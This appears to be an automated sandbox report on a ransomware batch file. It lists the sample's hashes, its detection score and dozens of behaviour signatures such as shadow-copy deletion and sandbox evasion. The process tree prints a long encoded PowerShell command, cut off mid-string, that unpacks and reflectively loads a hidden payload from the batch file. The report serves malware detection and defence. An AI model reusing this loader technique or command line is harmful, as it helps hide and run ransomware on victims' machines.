Edit tour
Windows
Analysis Report
R1TftmQpuQ.bat
Overview
General Information
| Sample name: | R1TftmQpuQ.batrenamed because original name is a hash value |
| Original sample name: | 3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat |
| Analysis ID: | 1611767 |
| MD5: | 659dc2c8af5180c5465f0e04e7334aed |
| SHA1: | a3e075c9d36c0077471f7034696af4c660630d9b |
| SHA256: | 3b8a2bcd9e8dd805793cc95c74d30f20ebc5714ea249d165afac29d1f3b0ace0 |
| Tags: | batuser-lighting9999 |
| Infos: |   |
 | |
Detection
Targeted Ransomware
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Kill multiple process
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RansomwareGeneric
Yara detected Targeted Ransomware
.NET source code contains potential unpacker
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Disables security and backup related services
Encrypted powershell cmdline option found
Excessive usage of taskkill to terminate processes
Found large BAT file
Joe Sandbox ML detected suspicious sample
May disable shadow drive data (uses vssadmin)
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Executable File Creation
Sigma detected: Suspicious Windows Service Tampering
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses attrib.exe to hide files
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 6204 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\R1Tft mQpuQ.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
attrib.exe (PID: 5892 cmdline: attrib +s +h "C:\Use rs\user\De sktop\R1Tf tmQpuQ.bat ".exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) 
R1TftmQpuQ.bat.exe (PID: 5664 cmdline: "C:\Users\ user\Deskt op\R1TftmQ puQ.bat".e xe -wIn 1 -enC JABlA HgAZQAgAD0 AIABbAFMAe QBzAHQAZQB tAC4ARABpA GEAZwBuAG8 AcwB0AGkAY wBzAC4AUAB yAG8AYwBlA HMAcwBdADo AOgBHAGUAd ABDAHUAcgB yAGUAbgB0A FAAcgBvAGM AZQBzAHMAK AApAC4ATQB hAGkAbgBNA G8AZAB1AGw AZQAuAEYAa QBsAGUATgB hAG0AZQA7A CAAJABsAGU AbgAgAD0AI AAkAGUAeAB lAC4ATABlA G4AZwB0AGg AOwAkAGwAZ QBuACAAPQA gACQAbABlA G4AIAAtACA ANAA7ACQAV wBlAGIAVAB pAHQAbABlA CAAPQAgAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIAAtA FQAeQBwAGU ATgBhAG0AZ QAgAFMAeQB zAHQAZQBtA C4AVABlAHg AdAAuAFMAd AByAGkAbgB nAEIAdQBpA GwAZABlAHI AOwAgAGYAb wByAGUAYQB jAGgAIAAoA CQAbABpAG4 AZQAgAGkAb gAgAFsAUwB 5AHMAdABlA G0ALgBJAE8 ALgBGAGkAb ABlAF0AOgA 6AFIAZQBhA GQATABpAG4 AZQBzACgAJ ABlAHgAZQA uAFIAZQBtA G8AdgBlACg AJABsAGUAb gApACkAKQA gAHsAIABpA GYAIAAoACQ AbABpAG4AZ QAgAC0AbAB pAGsAZQAgA CcAKgAgAK4 AKgAnACkAI AB7ACAAIAA kAFcAZQBiA FQAaQB0AGw AZQAuAEEAc ABwAGUAbgB kACgAJABsA GkAbgBlAC4 AUwBwAGwAa QB0ACgAJwC uACcAKQBbA DEAXQApACA AfAAgAE8Ad QB0AC0ATgB 1AGwAbAB9A CAAfQA7ACA AJABiAHkAd ABlAHMAIAA 9ACAAWwBTA HkAcwB0AGU AbQAuAEMAb wBuAHYAZQB yAHQAXQA6A DoARgByAG8 AbQBCAGEAc wBlADYANAB TAHQAcgBpA G4AZwAoACQ AVwBlAGIAV ABpAHQAbAB lAC4AVABvA FMAdAByAGk AbgBnACgAK QApADsAJAB pAG4AcAB1A HQAIAA9ACA ATgBlAHcAL QBPAGIAagB lAGMAdAAgA FMAeQBzAHQ AZQBtAC4AS QBPAC4ATQB lAG0AbwByA HkAUwB0AHI AZQBhAG0AK AAgACwAIAA kAGIAeQB0A GUAcwAgACk AOwAkAG8Ad QB0AHAAdQB 0ACAAPQAgA E4AZQB3AC0 ATwBiAGoAZ QBjAHQAIAB TAHkAcwB0A GUAbQAuAEk ATwAuAE0AZ QBtAG8AcgB 5AFMAdAByA GUAYQBtADs AJABnAHoAa QBwAFMAdAB yAGUAYQBtA CAAPQAgAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIABTA HkAcwB0AGU AbQAuAEkAT wAuAEMAbwB tAHAAcgBlA HMAcwBpAG8 AbgAuAEcAe gBpAHAAUwB 0AHIAZQBhA G0AIAAkAGk AbgBwAHUAd AAsACAAKAB bAEkATwAuA EMAbwBtAHA AcgBlAHMAc wBpAG8AbgA uAEMAbwBtA HAAcgBlAHM AcwBpAG8Ab gBNAG8AZAB lAF0AOgA6A EQAZQBjAG8 AbQBwAHIAZ QBzAHMAKQA 7ACQAZwB6A GkAcABTAHQ AcgBlAGEAb QAuAEMAbwB wAHkAVABvA CgAIAAkAG8 AdQB0AHAAd QB0ACAAKQA 7ACQAZwB6A GkAcABTAHQ AcgBlAGEAb QAuAEMAbAB vAHMAZQAoA CkAOwAkAGk AbgBwAHUAd AAuAEMAbAB vAHMAZQAoA CkAOwBbAGI AeQB0AGUAW wBdAF0AIAA kAGIAeQB0A GUAcwAgAD0 AIAAkAG8Ad QB0AHAAdQB 0AC4AVABvA EEAcgByAGE AeQAoACkAO wBbAEEAcgB yAGEAeQBdA DoAOgBSAGU AdgBlAHIAc wBlACgAJAB iAHkAdABlA HMAKQA7ACA AJABhAHMAc wBlAG0AYgB sAHkAIAA9A CAAWwBTAHk AcwB0AGUAb QAuAFIAZQB mAGwAZQBjA HQAaQBvAG4 ALgBBAHMAc wBlAG0AYgB sAHkAXQA6A DoATABvAGE AZAAoACQAY gB5AHQAZQB zACkAOwAgA CQAZQBuAHQ AcgB5AFAAb wBpAG4AdAB NAGUAdABoA G8AZAAgAD0 AIAAkAGEAc wBzAGUAbQB iAGwAeQAuA EcAZQB0AFQ AeQBwAGUAc wAoACkALgB XAGgAZQByA GUAKAB7ACA AJABfAC4AT gBhAG0AZQA gAC0AZQBxA CAAJwBXAHI AZwB2AGcAc AByACcAIAB 9ACwAIAAnA EYAaQByAHM AdAAnACkAL gBHAGUAdAB NAGUAdABoA G8AZAAoACc ATQBhAGkAb gAnACwAIAB bAFIAZQBmA GwAZQBjAHQ AaQBvAG4AL gBCAGkAbgB kAGkAbgBnA